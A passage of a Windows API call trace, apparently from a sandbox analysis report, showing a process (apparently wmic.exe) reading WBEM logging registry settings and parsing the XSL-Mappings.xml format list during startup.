(param_1="IDENTIFY") returned 0x8 [0253.786] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0253.786] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0253.786] SysStringLen (param_1="IDENTIFY") returned 0x8 [0253.786] malloc (_Size=0x30) returned 0x306b80 [0253.786] malloc (_Size=0x18) returned 0x306bc0 [0253.786] SysStringLen (param_1="IMPERSONATE") returned 0xb [0253.786] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0253.786] SysStringLen (param_1="IMPERSONATE") returned 0xb [0253.786] SysStringLen (param_1="IDENTIFY") returned 0x8 [0253.786] SysStringLen (param_1="IDENTIFY") returned 0x8 [0253.786] SysStringLen (param_1="IMPERSONATE") returned 0xb [0253.786] malloc (_Size=0x30) returned 0x306be0 [0253.786] malloc (_Size=0x18) returned 0x306c20 [0253.786] SysStringLen (param_1="DELEGATE") returned 0x8 [0253.786] SysStringLen (param_1="IDENTIFY") returned 0x8 [0253.786] SysStringLen (param_1="DELEGATE") returned 0x8 [0253.787] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0253.787] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0253.787] SysStringLen (param_1="DELEGATE") returned 0x8 [0253.787] malloc (_Size=0x30) returned 0x306c40 [0253.787] malloc (_Size=0x18) returned 0x306c80 [0253.787] malloc (_Size=0x30) returned 0x306ca0 [0253.787] malloc (_Size=0x18) returned 0x306ce0 [0253.787] SysStringLen (param_1="NONE") returned 0x4 [0253.787] SysStringLen (param_1="DEFAULT") returned 0x7 [0253.787] SysStringLen (param_1="DEFAULT") returned 0x7 [0253.787] SysStringLen (param_1="NONE") returned 0x4 [0253.787] malloc (_Size=0x30) returned 0x306d00 [0253.787] malloc (_Size=0x18) returned 0x306d40 [0253.787] SysStringLen (param_1="CONNECT") returned 0x7 [0253.787] SysStringLen (param_1="DEFAULT") returned 0x7 [0253.787] malloc (_Size=0x30) returned 0x306d60 [0253.787] malloc (_Size=0x18) returned 0x306da0 [0253.787] SysStringLen (param_1="CALL") returned 0x4 [0253.787] SysStringLen (param_1="DEFAULT") returned 0x7 [0253.787] SysStringLen (param_1="CALL") returned 0x4 [0253.787] SysStringLen (param_1="CONNECT") returned 0x7 [0253.787] malloc (_Size=0x30) returned 0x306dc0 [0253.787] malloc (_Size=0x18) returned 0x306e00 [0253.788] SysStringLen (param_1="PKT") returned 0x3 [0253.788] SysStringLen (param_1="DEFAULT") returned 0x7 [0253.788] SysStringLen (param_1="PKT") returned 0x3 [0253.788] SysStringLen (param_1="NONE") returned 0x4 [0253.788] SysStringLen (param_1="NONE") returned 0x4 [0253.788] SysStringLen (param_1="PKT") returned 0x3 [0253.788] malloc (_Size=0x30) returned 0x306e20 [0253.788] malloc (_Size=0x18) returned 0x306e60 [0253.788] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0253.788] SysStringLen (param_1="DEFAULT") returned 0x7 [0253.788] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0253.788] SysStringLen (param_1="NONE") returned 0x4 [0253.788] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0253.788] SysStringLen (param_1="PKT") returned 0x3 [0253.788] SysStringLen (param_1="PKT") returned 0x3 [0253.788] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0253.788] malloc (_Size=0x30) returned 0x308000 [0253.789] malloc (_Size=0x18) returned 0x306e80 [0253.789] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0253.789] SysStringLen (param_1="DEFAULT") returned 0x7 [0253.789] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0253.789] SysStringLen (param_1="PKT") returned 0x3 [0253.789] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0253.789] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0253.789] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0253.789] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0253.789] malloc (_Size=0x30) returned 0x308040 [0253.789] malloc (_Size=0x40) returned 0x306ea0 [0253.790] malloc (_Size=0x20a) returned 0x306ef0 [0253.790] GetSystemDirectoryW (in: lpBuffer=0x306ef0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0253.790] free (_Block=0x306ef0) [0253.790] malloc (_Size=0x18) returned 0x306ef0 [0253.790] malloc (_Size=0x18) returned 0x306f10 [0253.790] malloc (_Size=0x18) returned 0x306f30 [0253.790] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0253.790] SysStringLen (param_1="\\wbem\\") returned 0x6 [0253.790] free (_Block=0x306ef0) [0253.790] free (_Block=0x306f10) [0253.790] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0253.790] free (_Block=0x306f30) [0253.791] malloc (_Size=0x18) returned 0x306ef0 [0253.791] malloc (_Size=0x18) returned 0x306f10 [0253.791] malloc (_Size=0x18) returned 0x306f30 [0253.791] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0253.791] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0253.791] free (_Block=0x306ef0) [0253.791] free (_Block=0x306f10) [0253.791] GetCurrentThreadId () returned 0xabc [0253.791] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xaf500 | out: phkResult=0xaf500*=0xf8) returned 0x0 [0253.791] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xaf550, lpcbData=0xaf4f0*=0x400 | out: lpType=0x0, lpData=0xaf550*=0x30, lpcbData=0xaf4f0*=0x4) returned 0x0 [0253.791] _wcsicmp (_String1="0", _String2="1") returned -1 [0253.791] _wcsicmp (_String1="0", _String2="2") returned -2 [0253.791] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xaf4f0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xaf4f0*=0x42) returned 0x0 [0253.792] malloc (_Size=0x86) returned 0x306f50 [0253.792] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x306f50, lpcbData=0xaf4f0*=0x42 | out: lpType=0x0, lpData=0x306f50*=0x25, lpcbData=0xaf4f0*=0x42) returned 0x0 [0253.792] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0253.792] malloc (_Size=0x42) returned 0x306fe0 [0253.792] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0253.792] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xaf550, lpcbData=0xaf4f0*=0x400 | out: lpType=0x0, lpData=0xaf550*=0x36, lpcbData=0xaf4f0*=0xc) returned 0x0 [0253.792] _wtol (_String="65536") returned 65536 [0253.792] free (_Block=0x306f50) [0253.792] RegCloseKey (hKey=0x0) returned 0x6 [0253.792] CoCreateInstance (in: rclsid=0xff847410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff8473f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xaf9f8 | out: ppv=0xaf9f8*=0x21171d0) returned 0x0 [0253.819] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21171d0, xmlSource=0xafb40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x306ef0), isSuccessful=0xafbb0 | out: isSuccessful=0xafbb0*=0xffff) returned 0x0 [0254.095] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21171d0, DOMElement=0xaf9f0 | out: DOMElement=0xaf9f0*=0x211bc50) returned 0x0 [0254.096] malloc (_Size=0x18) returned 0x30c560 [0254.096] IXMLDOMElement:getElementsByTagName (in: This=0x211bc50, tagName="XSLFORMAT", resultList=0xafa00 | out: resultList=0xafa00*=0x2119cc0) returned 0x0 [0254.097] free (_Block=0x30c560) [0254.097] IXMLDOMNodeList:get_length (in: This=0x2119cc0, listLength=0xafbc8 | out: listLength=0xafbc8*=21) returned 0x0 [0254.098] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=0, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.098] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="texttable.xsl") returned 0x0 [0254.098] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.098] malloc (_Size=0x18) returned 0x30c560 [0254.098] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.098] free (_Block=0x30c560) [0254.098] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0254.099] malloc (_Size=0x18) returned 0x30c560 [0254.099] malloc (_Size=0x18) returned 0x30c580 [0254.099] malloc (_Size=0x30) returned 0x308080 [0254.099] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.099] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.099] IUnknown:Release (This=0x211a280) returned 0x0 [0254.099] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=1, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.099] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="textvaluelist.xsl") returned 0x0 [0254.099] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.099] malloc (_Size=0x18) returned 0x30c5a0 [0254.099] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.099] free (_Block=0x30c5a0) [0254.100] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0254.100] malloc (_Size=0x18) returned 0x30c5a0 [0254.100] malloc (_Size=0x18) returned 0x30c5c0 [0254.100] SysStringLen (param_1="VALUE") returned 0x5 [0254.100] SysStringLen (param_1="TABLE") returned 0x5 [0254.100] SysStringLen (param_1="TABLE") returned 0x5 [0254.100] SysStringLen (param_1="VALUE") returned 0x5 [0254.100] malloc (_Size=0x30) returned 0x3080c0 [0254.100] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.100] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.100] IUnknown:Release (This=0x211a280) returned 0x0 [0254.100] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=2, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.101] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="textvaluelist.xsl") returned 0x0 [0254.101] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.101] malloc (_Size=0x18) returned 0x30c5e0 [0254.101] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.101] free (_Block=0x30c5e0) [0254.101] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0254.101] malloc (_Size=0x18) returned 0x30c5e0 [0254.101] malloc (_Size=0x18) returned 0x30c600 [0254.101] SysStringLen (param_1="LIST") returned 0x4 [0254.101] SysStringLen (param_1="TABLE") returned 0x5 [0254.101] malloc (_Size=0x30) returned 0x308100 [0254.101] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.101] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.101] IUnknown:Release (This=0x211a280) returned 0x0 [0254.101] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=3, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.101] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="rawxml.xsl") returned 0x0 [0254.101] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.102] malloc (_Size=0x18) returned 0x30c620 [0254.102] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.102] free (_Block=0x30c620) [0254.102] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0254.102] malloc (_Size=0x18) returned 0x30c620 [0254.102] malloc (_Size=0x18) returned 0x30c640 [0254.102] SysStringLen (param_1="RAWXML") returned 0x6 [0254.102] SysStringLen (param_1="TABLE") returned 0x5 [0254.102] SysStringLen (param_1="RAWXML") returned 0x6 [0254.102] SysStringLen (param_1="LIST") returned 0x4 [0254.102] SysStringLen (param_1="LIST") returned 0x4 [0254.102] SysStringLen (param_1="RAWXML") returned 0x6 [0254.102] malloc (_Size=0x30) returned 0x308140 [0254.102] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.102] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.102] IUnknown:Release (This=0x211a280) returned 0x0 [0254.102] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=4, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.102] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="htable.xsl") returned 0x0 [0254.102] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.103] malloc (_Size=0x18) returned 0x30c660 [0254.103] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.103] free (_Block=0x30c660) [0254.103] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0254.103] malloc (_Size=0x18) returned 0x30c660 [0254.103] malloc (_Size=0x18) returned 0x30c680 [0254.103] SysStringLen (param_1="HTABLE") returned 0x6 [0254.103] SysStringLen (param_1="TABLE") returned 0x5 [0254.103] SysStringLen (param_1="HTABLE") returned 0x6 [0254.103] SysStringLen (param_1="LIST") returned 0x4 [0254.103] malloc (_Size=0x30) returned 0x308180 [0254.103] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.103] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.103] IUnknown:Release (This=0x211a280) returned 0x0 [0254.103] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=5, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.103] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="hform.xsl") returned 0x0 [0254.103] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.104] malloc (_Size=0x18) returned 0x30c6a0 [0254.104] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.104] free (_Block=0x30c6a0) [0254.104] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0254.104] malloc (_Size=0x18) returned 0x30c6a0 [0254.104] malloc (_Size=0x18) returned 0x30c6c0 [0254.104] SysStringLen (param_1="HFORM") returned 0x5 [0254.104] SysStringLen (param_1="TABLE") returned 0x5 [0254.104] SysStringLen (param_1="HFORM") returned 0x5 [0254.104] SysStringLen (param_1="LIST") returned 0x4 [0254.104] SysStringLen (param_1="HFORM") returned 0x5 [0254.104] SysStringLen (param_1="HTABLE") returned 0x6 [0254.104] malloc (_Size=0x30) returned 0x3081c0 [0254.104] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.104] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.104] IUnknown:Release (This=0x211a280) returned 0x0 [0254.104] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=6, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.105] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="xml.xsl") returned 0x0 [0254.105] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.105] malloc (_Size=0x18) returned 0x30c6e0 [0254.105] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.105] free (_Block=0x30c6e0) [0254.105] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0254.105] malloc (_Size=0x18) returned 0x30c6e0 [0254.105] malloc (_Size=0x18) returned 0x30c700 [0254.105] SysStringLen (param_1="XML") returned 0x3 [0254.105] SysStringLen (param_1="TABLE") returned 0x5 [0254.105] SysStringLen (param_1="XML") returned 0x3 [0254.105] SysStringLen (param_1="VALUE") returned 0x5 [0254.105] SysStringLen (param_1="VALUE") returned 0x5 [0254.105] SysStringLen (param_1="XML") returned 0x3 [0254.105] malloc (_Size=0x30) returned 0x308200 [0254.105] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.105] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.106] IUnknown:Release (This=0x211a280) returned 0x0 [0254.106] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=7, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.106] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="mof.xsl") returned 0x0 [0254.106] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.106] malloc (_Size=0x18) returned 0x30c720 [0254.106] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.106] free (_Block=0x30c720) [0254.106] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0254.106] malloc (_Size=0x18) returned 0x30c720 [0254.106] malloc (_Size=0x18) returned 0x30c740 [0254.106] SysStringLen (param_1="MOF") returned 0x3 [0254.106] SysStringLen (param_1="TABLE") returned 0x5 [0254.106] SysStringLen (param_1="MOF") returned 0x3 [0254.106] SysStringLen (param_1="LIST") returned 0x4 [0254.106] SysStringLen (param_1="MOF") returned 0x3 [0254.106] SysStringLen (param_1="RAWXML") returned 0x6 [0254.106] SysStringLen (param_1="LIST") returned 0x4 [0254.107] SysStringLen (param_1="MOF") returned 0x3 [0254.107] malloc (_Size=0x30) returned 0x308240 [0254.107] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.107] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.107] IUnknown:Release (This=0x211a280) returned 0x0 [0254.107] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=8, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.107] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="csv.xsl") returned 0x0 [0254.107] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.107] malloc (_Size=0x18) returned 0x30c760 [0254.107] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.107] free (_Block=0x30c760) [0254.107] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0254.107] malloc (_Size=0x18) returned 0x30c760 [0254.107] malloc (_Size=0x18) returned 0x30c780 [0254.107] SysStringLen (param_1="CSV") returned 0x3 [0254.107] SysStringLen (param_1="TABLE") returned 0x5 [0254.107] SysStringLen (param_1="CSV") returned 0x3 [0254.108] SysStringLen (param_1="LIST") returned 0x4 [0254.108] SysStringLen (param_1="CSV") returned 0x3 [0254.108] SysStringLen (param_1="HTABLE") returned 0x6 [0254.108] SysStringLen (param_1="CSV") returned 0x3 [0254.108] SysStringLen (param_1="HFORM") returned 0x5 [0254.108] malloc (_Size=0x30) returned 0x308280 [0254.108] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.108] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.108] IUnknown:Release (This=0x211a280) returned 0x0 [0254.108] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=9, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.108] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="texttable.xsl") returned 0x0 [0254.108] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.108] malloc (_Size=0x18) returned 0x30c7a0 [0254.108] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.108] free (_Block=0x30c7a0) [0254.108] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0254.108] malloc (_Size=0x18) returned 0x30c7a0 [0254.108] malloc (_Size=0x18) returned 0x30c7c0 [0254.109] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.109] SysStringLen (param_1="TABLE") returned 0x5 [0254.109] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.109] SysStringLen (param_1="VALUE") returned 0x5 [0254.109] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.109] SysStringLen (param_1="XML") returned 0x3 [0254.109] SysStringLen (param_1="XML") returned 0x3 [0254.109] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.109] malloc (_Size=0x30) returned 0x3082c0 [0254.109] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.109] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.109] IUnknown:Release (This=0x211a280) returned 0x0 [0254.109] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=10, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.109] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="texttable.xsl") returned 0x0 [0254.109] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.109] malloc (_Size=0x18) returned 0x30c7e0 [0254.109] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.110] free (_Block=0x30c7e0) [0254.110] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0254.110] malloc (_Size=0x18) returned 0x30c7e0 [0254.110] malloc (_Size=0x18) returned 0x30c800 [0254.110] SysStringLen (param_1="texttablewsys") returned 0xd [0254.110] SysStringLen (param_1="TABLE") returned 0x5 [0254.110] SysStringLen (param_1="texttablewsys") returned 0xd [0254.110] SysStringLen (param_1="XML") returned 0x3 [0254.110] SysStringLen (param_1="texttablewsys") returned 0xd [0254.110] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.110] SysStringLen (param_1="XML") returned 0x3 [0254.110] SysStringLen (param_1="texttablewsys") returned 0xd [0254.110] malloc (_Size=0x30) returned 0x308300 [0254.110] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.110] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.110] IUnknown:Release (This=0x211a280) returned 0x0 [0254.110] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=11, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.110] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="texttable.xsl") returned 0x0 [0254.110] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.110] malloc (_Size=0x18) returned 0x30c820 [0254.111] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.111] free (_Block=0x30c820) [0254.111] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0254.111] malloc (_Size=0x18) returned 0x30c820 [0254.111] malloc (_Size=0x18) returned 0x30c840 [0254.111] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.111] SysStringLen (param_1="TABLE") returned 0x5 [0254.111] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.111] SysStringLen (param_1="XML") returned 0x3 [0254.111] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.111] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.111] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.111] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.111] malloc (_Size=0x30) returned 0x308340 [0254.111] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.111] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.111] IUnknown:Release (This=0x211a280) returned 0x0 [0254.111] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=12, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.111] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="texttable.xsl") returned 0x0 [0254.112] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.112] malloc (_Size=0x18) returned 0x30c860 [0254.112] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.112] free (_Block=0x30c860) [0254.112] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0254.112] malloc (_Size=0x18) returned 0x30c860 [0254.112] malloc (_Size=0x18) returned 0x30c880 [0254.112] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0254.112] SysStringLen (param_1="TABLE") returned 0x5 [0254.112] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0254.112] SysStringLen (param_1="XML") returned 0x3 [0254.112] SysStringLen 